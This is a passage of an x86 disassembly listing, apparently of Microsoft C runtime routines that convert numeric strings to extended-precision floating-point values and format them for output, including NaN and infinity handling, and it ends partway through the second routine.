sub_4123ED proc near ; CODE XREF: sub_4114AD+37�p
; sub_411553+37�p
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_46 = dword ptr -46h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_9 = byte ptr -9
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 7Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
push esi
xor esi, esi
mov [ebp+var_7C], eax
mov eax, [ebp+arg_4]
inc esi
xor ecx, ecx
cmp [ebp+arg_1C], ebx
push edi
mov [ebp+var_70], eax
lea edi, [ebp+var_20]
mov [ebp+var_74], ebx
mov [ebp+var_68], esi
mov [ebp+var_4C], ebx
mov [ebp+var_58], ebx
mov [ebp+var_5C], ebx
mov [ebp+var_60], ebx
mov [ebp+var_64], ebx
mov [ebp+var_50], ebx
mov [ebp+var_6C], ebx
jnz short loc_412455
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
xor eax, eax
jmp loc_412A6F
; ---------------------------------------------------------------------------
loc_412455: ; CODE XREF: sub_4123ED+47�j
mov edx, [ebp+arg_8]
mov [ebp+var_54], edx
loc_41245B: ; CODE XREF: sub_4123ED+81�j
mov al, [edx]
cmp al, 20h
jz short loc_41246D
cmp al, 9
jz short loc_41246D
cmp al, 0Ah
jz short loc_41246D
cmp al, 0Dh
jnz short loc_412470
loc_41246D: ; CODE XREF: sub_4123ED+72�j
; sub_4123ED+76�j ...
inc edx
jmp short loc_41245B
; ---------------------------------------------------------------------------
loc_412470: ; CODE XREF: sub_4123ED+7E�j
mov bl, 30h
loc_412472: ; CODE XREF: sub_4123ED+A6�j
; sub_4123ED+BC�j ...
mov al, [edx]
inc edx
cmp ecx, 0Bh ; switch 12 cases
ja loc_4126AD ; default
; jumptable 0041247E case 10
jmp off_412A81[ecx*4] ; switch jump
loc_412485: ; DATA XREF: J8@F_7_S:off_412A81�o
mov cl, al ; jumptable 0041247E case 0
sub cl, 31h
cmp cl, 8
ja short loc_412495
loc_41248F: ; CODE XREF: sub_4123ED+F7�j
; sub_4123ED+14A�j
push 3
loc_412491: ; CODE XREF: sub_4123ED+201�j
; sub_4123ED+218�j
pop ecx
dec edx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_412495: ; CODE XREF: sub_4123ED+A0�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124AB
loc_4124A6: ; CODE XREF: sub_4123ED+15F�j
push 5
loc_4124A8: ; CODE XREF: sub_4123ED+10C�j
; sub_4123ED+138�j ...
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124AB: ; CODE XREF: sub_4123ED+B7�j
movsx eax, al
sub eax, 2Bh
jz short loc_4124D0
dec eax
dec eax
jz short loc_4124C4
sub eax, 3
jnz loc_41264B
loc_4124C0: ; CODE XREF: sub_4123ED+118�j
; sub_4123ED+167�j
mov ecx, esi
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124C4: ; CODE XREF: sub_4123ED+C8�j
push 2
pop ecx
mov [ebp+var_74], 8000h
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D0: ; CODE XREF: sub_4123ED+C4�j
and [ebp+var_74], 0
push 2
pop ecx
jmp short loc_412472
; ---------------------------------------------------------------------------
loc_4124D9: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov cl, al ; jumptable 0041247E case 1
sub cl, 31h
cmp cl, 8
mov [ebp+var_58], esi
jbe short loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jnz short loc_4124FB
loc_4124F7: ; CODE XREF: sub_4123ED+1A7�j
push 4
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_4124FB: ; CODE XREF: sub_4123ED+108�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
cmp al, bl
jz short loc_4124C0
loc_412507: ; CODE XREF: sub_4123ED+1B5�j
cmp al, 43h
jle loc_41264B
cmp al, 45h
jle short loc_412523
cmp al, 63h
jle loc_41264B
cmp al, 65h
jg loc_41264B
loc_412523: ; CODE XREF: sub_4123ED+124�j
push 6
jmp short loc_4124A8
; ---------------------------------------------------------------------------
loc_412527: ; CODE XREF: sub_4123ED+110�j
; sub_4123ED+114�j ...
dec edx
push 0Bh
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_41252F: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov cl, al ; jumptable 0041247E case 2
sub cl, 31h
cmp cl, 8
jbe loc_41248F
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124A6
cmp al, bl
jz loc_4124C0
loc_41255A: ; CODE XREF: sub_4123ED+1F9�j
; sub_4123ED:loc_412619�j
mov edx, [ebp+var_54]
jmp loc_412676
; ---------------------------------------------------------------------------
loc_412562: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov [ebp+var_58], esi ; jumptable 0041247E case 3
jmp short loc_412581
; ---------------------------------------------------------------------------
loc_412567: ; CODE XREF: sub_4123ED+196�j
cmp al, 39h
jg short loc_412585
cmp [ebp+var_4C], 19h
jnb short loc_41257B
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
jmp short loc_41257E
; ---------------------------------------------------------------------------
loc_41257B: ; CODE XREF: sub_4123ED+182�j
inc [ebp+var_50]
loc_41257E: ; CODE XREF: sub_4123ED+18C�j
mov al, [edx]
inc edx
loc_412581: ; CODE XREF: sub_4123ED+178�j
cmp al, bl
jge short loc_412567
loc_412585: ; CODE XREF: sub_4123ED+17C�j
mov ecx, [ebp+arg_1C]
mov ecx, [ecx]
mov ecx, [ecx+0BCh]
mov ecx, [ecx]
cmp al, [ecx]
jz loc_4124F7
loc_41259A: ; CODE XREF: sub_4123ED+1D6�j
; sub_4123ED+1F0�j
cmp al, 2Bh
jz short loc_412527
cmp al, 2Dh
jz short loc_412527
jmp loc_412507
; ---------------------------------------------------------------------------
loc_4125A7: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
cmp [ebp+var_4C], 0 ; jumptable 0041247E case 4
mov [ebp+var_58], esi
mov [ebp+var_5C], esi
jnz short loc_4125D9
jmp short loc_4125BB
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_4123ED+1D0�j
dec [ebp+var_50]
mov al, [edx]
inc edx
loc_4125BB: ; CODE XREF: sub_4123ED+1C6�j
cmp al, bl
jz short loc_4125B5
jmp short loc_4125D9
; ---------------------------------------------------------------------------
loc_4125C1: ; CODE XREF: sub_4123ED+1EE�j
cmp al, 39h
jg short loc_41259A
cmp [ebp+var_4C], 19h
jnb short loc_4125D6
inc [ebp+var_4C]
sub al, bl
mov [edi], al
inc edi
dec [ebp+var_50]
loc_4125D6: ; CODE XREF: sub_4123ED+1DC�j
mov al, [edx]
inc edx
loc_4125D9: ; CODE XREF: sub_4123ED+1C4�j
; sub_4123ED+1D2�j
cmp al, bl
jge short loc_4125C1
jmp short loc_41259A
; ---------------------------------------------------------------------------
loc_4125DF: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
sub al, bl ; jumptable 0041247E case 5
cmp al, 9
mov [ebp+var_5C], esi
ja loc_41255A
push 4
jmp loc_412491
; ---------------------------------------------------------------------------
loc_4125F3: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
lea ecx, [edx-2] ; jumptable 0041247E case 6
mov [ebp+var_54], ecx
mov cl, al
sub cl, 31h
cmp cl, 8
ja short loc_41260A
loc_412603: ; CODE XREF: sub_4123ED+25C�j
; sub_4123ED+269�j
push 9
jmp loc_412491
; ---------------------------------------------------------------------------
loc_41260A: ; CODE XREF: sub_4123ED+214�j
movsx eax, al
sub eax, 2Bh
jz short loc_412632
dec eax
dec eax
jz short loc_412626
sub eax, 3
loc_412619: ; CODE XREF: sub_4123ED+26D�j
jnz loc_41255A
push 8
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412626: ; CODE XREF: sub_4123ED+227�j
; sub_4123ED+285�j
or [ebp+var_68], 0FFFFFFFFh
push 7
pop ecx
jmp loc_412472
; ---------------------------------------------------------------------------
loc_412632: ; CODE XREF: sub_4123ED+223�j
; sub_4123ED+281�j
push 7
jmp loc_4124A8
; ---------------------------------------------------------------------------
loc_412639: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 8
jmp short loc_412641
; ---------------------------------------------------------------------------
loc_41263E: ; CODE XREF: sub_4123ED+256�j
mov al, [edx]
inc edx
loc_412641: ; CODE XREF: sub_4123ED+24F�j
cmp al, bl
jz short loc_41263E
sub al, 31h
cmp al, 8
jbe short loc_412603
loc_41264B: ; CODE XREF: sub_4123ED+CD�j
; sub_4123ED+11C�j ...
dec edx
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_41264E: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov cl, al ; jumptable 0041247E case 7
sub cl, 31h
cmp cl, 8
jbe short loc_412603
cmp al, bl
jmp short loc_412619
; ---------------------------------------------------------------------------
loc_41265C: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
cmp [ebp+arg_18], 0 ; jumptable 0041247E case 11
jz short loc_4126A9
movsx eax, al
sub eax, 2Bh
lea ecx, [edx-1]
mov [ebp+var_54], ecx
jz short loc_412632
dec eax
dec eax
jz short loc_412626
mov edx, ecx
loc_412676: ; CODE XREF: sub_4123ED+170�j
; sub_4123ED+25F�j ...
cmp [ebp+var_58], 0
mov eax, [ebp+var_70]
mov [eax], edx
jz loc_412A2A
push 18h
pop eax
cmp [ebp+var_4C], eax
jbe short loc_41269D
cmp [ebp+var_9], 5
jl short loc_412696
inc [ebp+var_9]
loc_412696: ; CODE XREF: sub_4123ED+2A4�j
dec edi
inc [ebp+var_50]
mov [ebp+var_4C], eax
loc_41269D: ; CODE XREF: sub_4123ED+29E�j
cmp [ebp+var_4C], 0
jbe loc_412A51
jmp short loc_412702
; ---------------------------------------------------------------------------
loc_4126A9: ; CODE XREF: sub_4123ED+273�j
push 0Ah
pop ecx
dec edx
loc_4126AD: ; CODE XREF: sub_4123ED+8B�j
; sub_4123ED+91�j
; DATA XREF: ...
cmp ecx, 0Ah ; default
; jumptable 0041247E case 10
jnz loc_412472
jmp short loc_412676
; ---------------------------------------------------------------------------
loc_4126B8: ; CODE XREF: sub_4123ED+91�j
; DATA XREF: J8@F_7_S:off_412A81�o
mov [ebp+var_60], esi ; jumptable 0041247E case 9
xor ecx, ecx
jmp short loc_4126D8
; ---------------------------------------------------------------------------
loc_4126BF: ; CODE XREF: sub_4123ED+2ED�j
cmp al, 39h
jg short loc_4126E3
imul ecx, 0Ah
movsx esi, al
lea ecx, [ecx+esi-30h]
cmp ecx, 1450h
jg short loc_4126DE
mov al, [edx]
inc edx
loc_4126D8: ; CODE XREF: sub_4123ED+2D0�j
cmp al, bl
jge short loc_4126BF
jmp short loc_4126E3
; ---------------------------------------------------------------------------
loc_4126DE: ; CODE XREF: sub_4123ED+2E6�j
mov ecx, 1451h
loc_4126E3: ; CODE XREF: sub_4123ED+2D4�j
; sub_4123ED+2EF�j
mov [ebp+var_64], ecx
jmp short loc_4126F3
; ---------------------------------------------------------------------------
loc_4126E8: ; CODE XREF: sub_4123ED+308�j
cmp al, 39h
jg loc_41264B
mov al, [edx]
inc edx
loc_4126F3: ; CODE XREF: sub_4123ED+2F9�j
cmp al, bl
jge short loc_4126E8
jmp loc_41264B
; ---------------------------------------------------------------------------
loc_4126FC: ; CODE XREF: sub_4123ED+319�j
dec [ebp+var_4C]
inc [ebp+var_50]
loc_412702: ; CODE XREF: sub_4123ED+2BA�j
dec edi
cmp byte ptr [edi], 0
jz short loc_4126FC
lea eax, [ebp+var_3C]
push eax
push [ebp+var_4C]
lea eax, [ebp+var_20]
push eax
call sub_4137AA
mov eax, [ebp+var_64]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_68], ecx
jge short loc_412727
neg eax
loc_412727: ; CODE XREF: sub_4123ED+336�j
add eax, [ebp+var_50]
cmp [ebp+var_60], ecx
jnz short loc_412732
add eax, [ebp+arg_10]
loc_412732: ; CODE XREF: sub_4123ED+340�j
cmp [ebp+var_5C], ecx
jnz short loc_41273A
sub eax, [ebp+arg_14]
loc_41273A: ; CODE XREF: sub_4123ED+348�j
cmp eax, 1450h
jg loc_412A33
cmp eax, 0FFFFEBB0h
jl loc_412A4A
mov esi, offset dword_424260
sub esi, 60h
cmp eax, ecx
mov [ebp+var_54], eax
jz loc_412A18
jge short loc_412772
neg eax
mov esi, offset dword_4243C0
mov [ebp+var_54], eax
sub esi, 60h
loc_412772: ; CODE XREF: sub_4123ED+376�j
cmp [ebp+arg_C], ecx
jnz short loc_41277B
mov word ptr [ebp+var_3C], cx
loc_41277B: ; CODE XREF: sub_4123ED+388�j
cmp [ebp+var_54], ecx
jz loc_412A18
loc_412784: ; CODE XREF: sub_4123ED+625�j
mov eax, [ebp+var_54]
sar [ebp+var_54], 3
add esi, 54h
and eax, 7
test eax, eax
mov [ebp+var_4C], esi
jz loc_412A0E
imul eax, 0Ch
add eax, esi
mov ebx, eax
cmp word ptr [ebx], 8000h
mov [ebp+var_70], ebx
jb short loc_4127C1
mov esi, ebx
lea edi, [ebp+var_48]
movsd
movsd
movsd
dec [ebp+var_46]
mov esi, [ebp+var_4C]
lea ebx, [ebp+var_48]
mov [ebp+var_70], ebx
loc_4127C1: ; CODE XREF: sub_4123ED+3BE�j
movzx edx, word ptr [ebx+0Ah]
mov ecx, [ebp+var_32]
xor eax, eax
mov [ebp+var_50], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov eax, edx
mov edi, 7FFFh
xor eax, ecx
and ecx, edi
and edx, edi
and eax, 8000h
cmp cx, 7FFFh
lea edi, [edx+ecx]
movzx edi, di
jnb loc_4129F4
cmp dx, 7FFFh
jnb loc_4129F4
cmp di, 0BFFDh
ja loc_4129F4
cmp di, 3FBFh
ja short loc_412823
xor eax, eax
mov [ebp+var_38], eax
mov [ebp+var_3C], eax
jmp loc_412A0B
; ---------------------------------------------------------------------------
loc_412823: ; CODE XREF: sub_4123ED+427�j
test cx, cx
jnz short loc_412847
inc edi
test dword ptr [ebp-34h], 7FFFFFFFh
jnz short loc_412847
cmp [ebp+var_38], 0
jnz short loc_412847
cmp [ebp+var_3C], 0
jnz short loc_412847
and word ptr [ebp+var_32], cx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_412847: ; CODE XREF: sub_4123ED+439�j
; sub_4123ED+443�j ...
xor ecx, ecx
cmp dx, cx
jnz short loc_41286F
inc edi
test dword ptr [ebx+8], 7FFFFFFFh
jnz short loc_41286F
cmp [ebx+4], ecx
jnz short loc_41286F
cmp [ebx], ecx
jnz short loc_41286F
mov [ebp-34h], ecx
mov [ebp+var_38], ecx
mov [ebp+var_3C], ecx
jmp loc_412A0E
; ---------------------------------------------------------------------------
loc_41286F: ; CODE XREF: sub_4123ED+45F�j
; sub_4123ED+469�j ...
and [ebp+var_68], ecx
lea esi, [ebp+var_28]
mov [ebp+var_58], 5
loc_41287C: ; CODE XREF: sub_4123ED+4FF�j
mov ecx, [ebp+var_68]
mov edx, [ebp+var_58]
add ecx, ecx
test edx, edx
mov [ebp+var_64], edx
jle short loc_4128E0
lea ecx, [ebp+ecx+var_3C]
add ebx, 8
mov [ebp+var_5C], ecx
mov [ebp+var_60], ebx
loc_412898: ; CODE XREF: sub_4123ED+4EE�j
mov ecx, [ebp+var_60]
mov edx, [ebp+var_5C]
movzx edx, word ptr [edx]
movzx ecx, word ptr [ecx]
and [ebp+var_78], 0
imul ecx, edx
mov edx, [esi-4]
lea ebx, [edx+ecx]
cmp ebx, edx
jb short loc_4128B9
cmp ebx, ecx
jnb short loc_4128C0
loc_4128B9: ; CODE XREF: sub_4123ED+4C6�j
mov [ebp+var_78], 1
loc_4128C0: ; CODE XREF: sub_4123ED+4CA�j
cmp [ebp+var_78], 0
mov [esi-4], ebx
jz short loc_4128CC
inc word ptr [esi]
loc_4128CC: ; CODE XREF: sub_4123ED+4DA�j
add [ebp+var_5C], 2
sub [ebp+var_60], 2
dec [ebp+var_64]
cmp [ebp+var_64], 0
jg short loc_412898
mov ebx, [ebp+var_70]
loc_4128E0: ; CODE XREF: sub_4123ED+49C�j
inc esi
inc esi
inc [ebp+var_68]
dec [ebp+var_58]
cmp [ebp+var_58], 0
jg short loc_41287C
add edi, 0C002h
test di, di
jle short loc_412934
loc_4128F9: ; CODE XREF: sub_4123ED+540�j
test [ebp+var_24], 80000000h
jnz short loc_41292F
mov esi, [ebp+var_28]
mov ecx, [ebp+var_2C]
shl [ebp+var_2C], 1
shr ecx, 1Fh
mov edx, esi
add esi, esi
or esi, ecx
mov ecx, [ebp+var_24]
shr edx, 1Fh
add ecx, ecx
or ecx, edx
add edi, 0FFFFh
test di, di
mov [ebp+var_28], esi
mov [ebp+var_24], ecx
jg short loc_4128F9
loc_41292F: ; CODE XREF: sub_4123ED+513�j
test di, di
jg short loc_412982
loc_412934: ; CODE XREF: sub_4123ED+50A�j
add edi, 0FFFFh
test di, di
jge short loc_412982
mov ecx, edi
neg ecx
movzx esi, cx
add edi, esi
loc_412948: ; CODE XREF: sub_4123ED+588�j
test byte ptr [ebp+var_2C], 1
jz short loc_412951
inc [ebp+var_50]
loc_412951: ; CODE XREF: sub_4123ED+55F�j
mov ecx, [ebp+var_24]
mov ebx, [ebp+var_28]
mov edx, [ebp+var_28]
shr [ebp+var_24], 1
shl ecx, 1Fh
shr ebx, 1
or ebx, ecx
mov ecx, [ebp+var_2C]
shl edx, 1Fh
shr ecx, 1
or ecx, edx
dec esi
mov [ebp+var_28], ebx
mov [ebp+var_2C], ecx
jnz short loc_412948
cmp [ebp+var_50], 0
jz short loc_412982
or word ptr [ebp+var_2C], 1
loc_412982: ; CODE XREF: sub_4123ED+545�j
; sub_4123ED+550�j ...
cmp word ptr [ebp+var_2C], 8000h
ja short loc_41299B
mov ecx, [ebp+var_2C]
and ecx, 1FFFFh
cmp ecx, 18000h
jnz short loc_4129CE
loc_41299B: ; CODE XREF: sub_4123ED+59B�j
cmp [ebp+var_2C+2], 0FFFFFFFFh
jnz short loc_4129CB
and [ebp+var_2C+2], 0
cmp [ebp+var_28+2], 0FFFFFFFFh
jnz short loc_4129C6
and [ebp+var_28+2], 0
cmp word ptr [ebp+var_24+2], 0FFFFh
jnz short loc_4129C0
mov word ptr [ebp+var_24+2], 8000h
inc edi
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C0: ; CODE XREF: sub_4123ED+5C8�j
inc word ptr [ebp+var_24+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129C6: ; CODE XREF: sub_4123ED+5BC�j
inc [ebp+var_28+2]
jmp short loc_4129CE
; ---------------------------------------------------------------------------
loc_4129CB: ; CODE XREF: sub_4123ED+5B2�j
inc [ebp+var_2C+2]
loc_4129CE: ; CODE XREF: sub_4123ED+5AC�j
; sub_4123ED+5D1�j ...
cmp di, 7FFFh
mov esi, [ebp+var_4C]
jnb short loc_4129F4
mov cx, word ptr [ebp+var_2C+2]
mov word ptr [ebp+var_3C], cx
mov ecx, [ebp+var_28]
mov [ebp+var_3C+2], ecx
mov ecx, [ebp+var_24]
or edi, eax
mov [ebp+var_38+2], ecx
mov word ptr [ebp+var_32], di
jmp short loc_412A0E
; ---------------------------------------------------------------------------
loc_4129F4: ; CODE XREF: sub_4123ED+406�j
; sub_4123ED+411�j ...
neg ax
sbb eax, eax
and [ebp+var_38], 0
and eax, 80000000h
add eax, 7FFF8000h
and [ebp+var_3C], 0
loc_412A0B: ; CODE XREF: sub_4123ED+431�j
mov [ebp-34h], eax
loc_412A0E: ; CODE XREF: sub_4123ED+3A9�j
; sub_4123ED+455�j ...
cmp [ebp+var_54], 0
jnz loc_412784
loc_412A18: ; CODE XREF: sub_4123ED+370�j
; sub_4123ED+391�j
mov eax, [ebp-34h]
movzx ecx, word ptr [ebp+var_3C]
mov esi, [ebp+var_3C+2]
mov edx, [ebp+var_38+2]
shr eax, 10h
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A2A: ; CODE XREF: sub_4123ED+292�j
mov [ebp+var_6C], 4
jmp short loc_412A51
; ---------------------------------------------------------------------------
loc_412A33: ; CODE XREF: sub_4123ED+352�j
xor esi, esi
mov eax, 7FFFh
mov edx, 80000000h
xor ecx, ecx
mov [ebp+var_6C], 2
jmp short loc_412A59
; ---------------------------------------------------------------------------
loc_412A4A: ; CODE XREF: sub_4123ED+35D�j
mov [ebp+var_6C], 1
loc_412A51: ; CODE XREF: sub_4123ED+2B4�j
; sub_4123ED+644�j
xor ecx, ecx
xor eax, eax
xor edx, edx
xor esi, esi
loc_412A59: ; CODE XREF: sub_4123ED+63B�j
; sub_4123ED+65B�j
mov edi, [ebp+var_7C]
or eax, [ebp+var_74]
mov [edi], cx
mov [edi+0Ah], ax
mov eax, [ebp+var_6C]
mov [edi+2], esi
mov [edi+6], edx
loc_412A6F: ; CODE XREF: sub_4123ED+63�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4123ED endp
; ---------------------------------------------------------------------------
db 8Dh, 49h, 0
off_412A81 dd offset loc_412485 ; DATA XREF: sub_4123ED+91�r
dd offset loc_4124D9 ; jump table for switch statement
dd offset loc_41252F
dd offset loc_412562
dd offset loc_4125A7
dd offset loc_4125DF
dd offset loc_4125F3
dd offset loc_41264E
dd offset loc_412639
dd offset loc_4126B8
dd offset loc_4126AD
dd offset loc_41265C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412AB1 proc near ; CODE XREF: sub_411771+3F�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1A = dword ptr -1Ah
var_16 = dword ptr -16h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 74h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
lea esi, [ebp+arg_0]
lea edi, [ebp+var_10]
movsd
movsd
movsw
mov edx, [ebp+var_8]
mov ecx, edx
mov eax, 8000h
and ecx, eax
and edx, 7FFFh
test cx, cx
mov [ebp+var_60], ebx
mov byte ptr [ebp+var_30], 0CCh
mov byte ptr [ebp+var_30+1], 0CCh
mov byte ptr [ebp+var_30+2], 0CCh
mov byte ptr [ebp+var_30+3], 0CCh
mov byte ptr [ebp+var_2C], 0CCh
mov byte ptr [ebp+var_2C+1], 0CCh
mov byte ptr [ebp+var_2C+2], 0CCh
mov byte ptr [ebp+var_2C+3], 0CCh
mov byte ptr [ebp+var_28], 0CCh
mov byte ptr [ebp+var_28+1], 0CCh
mov byte ptr [ebp+var_28+2], 0FBh
mov byte ptr [ebp+var_28+3], 3Fh
mov [ebp+var_74], 1
mov [ebp+var_6C], ecx
jz short loc_412B2B
mov byte ptr [ebx+2], 2Dh
jmp short loc_412B2F
; ---------------------------------------------------------------------------
loc_412B2B: ; CODE XREF: sub_412AB1+72�j
mov byte ptr [ebx+2], 20h
loc_412B2F: ; CODE XREF: sub_412AB1+78�j
test dx, dx
mov esi, [ebp+var_C]
mov edi, [ebp+var_10]
jnz short loc_412B68
test esi, esi
jnz short loc_412B68
test edi, edi
jnz short loc_412B68
and [ebx], di
cmp cx, ax
setnz al
dec al
and al, 0Dh
add al, 20h
mov [ebx+2], al
mov byte ptr [ebx+3], 1
mov byte ptr [ebx+4], 30h
mov byte ptr [ebx+5], 0
loc_412B60: ; CODE XREF: sub_412AB1+6FB�j
; sub_412AB1+8C3�j
xor eax, eax
inc eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412B68: ; CODE XREF: sub_412AB1+87�j
; sub_412AB1+8B�j ...
cmp dx, 7FFFh
jnz loc_412C11
mov eax, 80000000h
cmp esi, eax
mov word ptr [ebx], 1
jnz short loc_412B85
test edi, edi
jz short loc_412B94
loc_412B85: ; CODE XREF: sub_412AB1+CE�j
test esi, 40000000h
jnz short loc_412B94
push offset a1Snan ; "1#SNAN"
jmp short loc_412BE5
; ---------------------------------------------------------------------------
loc_412B94: ; CODE XREF: sub_412AB1+D2�j
; sub_412AB1+DA�j
test cx, cx
jz short loc_412BAC
cmp esi, 0C0000000h
jnz short loc_412BAC
test edi, edi
jnz short loc_412BE0
push offset a1Ind ; "1#IND"
jmp short loc_412BB9
; ---------------------------------------------------------------------------
loc_412BAC: ; CODE XREF: sub_412AB1+E6�j
; sub_412AB1+EE�j
cmp esi, eax
jnz short loc_412BE0
test edi, edi
jnz short loc_412BE0
push offset a1Inf ; "1#INF"
loc_412BB9: ; CODE XREF: sub_412AB1+F9�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412BDA
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412BDA: ; CODE XREF: sub_412AB1+11A�j
mov byte ptr [ebx+3], 5
jmp short loc_412C0A
; ---------------------------------------------------------------------------
loc_412BE0: ; CODE XREF: sub_412AB1+F2�j
; sub_412AB1+FD�j ...
push offset a1Qnan ; "1#QNAN"
loc_412BE5: ; CODE XREF: sub_412AB1+E1�j
lea eax, [ebx+4]
push 16h
push eax
call sub_4076D5
add esp, 0Ch
xor esi, esi
test eax, eax
jz short loc_412C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_412C06: ; CODE XREF: sub_412AB1+146�j
mov byte ptr [ebx+3], 6
loc_412C0A: ; CODE XREF: sub_412AB1+12D�j
xor eax, eax
jmp loc_413331
; ---------------------------------------------------------------------------
loc_412C11: ; CODE XREF: sub_412AB1+BC�j
movzx ecx, dx
mov ebx, ecx
imul ecx, 4D10h
shr ebx, 8
mov eax, esi
shr eax, 18h
lea eax, [ebx+eax*2]
imul eax, 4Dh
lea eax, [eax+ecx-134312F4h]
sar eax, 10h
movzx ecx, ax
movsx ebx, cx
mov [ebp+var_4C], ecx
xor eax, eax
mov ecx, offset dword_424260
neg ebx
sub ecx, 60h
cmp ebx, eax
mov word ptr [ebp+var_16], dx
mov [ebp+var_1A], esi
mov [ebp+var_20+2], edi
mov word ptr [ebp+var_20], ax
mov [ebp+var_68], ecx
jz loc_412F10
jge short loc_412C71
mov ecx, offset dword_4243C0
neg ebx
sub ecx, 60h
mov [ebp+var_68], ecx
loc_412C71: ; CODE XREF: sub_412AB1+1B1�j
cmp ebx, eax
jz loc_412F10
loc_412C79: ; CODE XREF: sub_412AB1+457�j
add [ebp+var_68], 54h
mov ecx, ebx
and ecx, 7
sar ebx, 3
test ecx, ecx
jz loc_412F06
imul ecx, 0Ch
add ecx, [ebp+var_68]
cmp word ptr [ecx], 8000h
mov [ebp+var_64], ecx
jb short loc_412CB0
mov esi, ecx
lea edi, [ebp+var_3C]
movsd
movsd
lea eax, [ebp+var_3C]
movsd
dec [ebp+var_3C+2]
mov [ebp+var_64], eax
mov ecx, eax
loc_412CB0: ; CODE XREF: sub_412AB1+1EA�j
movzx edi, word ptr [ecx+0Ah]
mov edx, [ebp+var_16]
xor eax, eax
mov ecx, edi
mov esi, 7FFFh
xor ecx, edx
and edx, esi
and edi, esi
mov [ebp+var_48], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
and ecx, 8000h
cmp dx, si
lea eax, [edi+edx]
movzx eax, ax
jnb loc_412EEA
cmp di, si
jnb loc_412EEA
cmp ax, 0BFFDh
ja loc_412EEA
cmp ax, 3FBFh
ja short loc_412D10
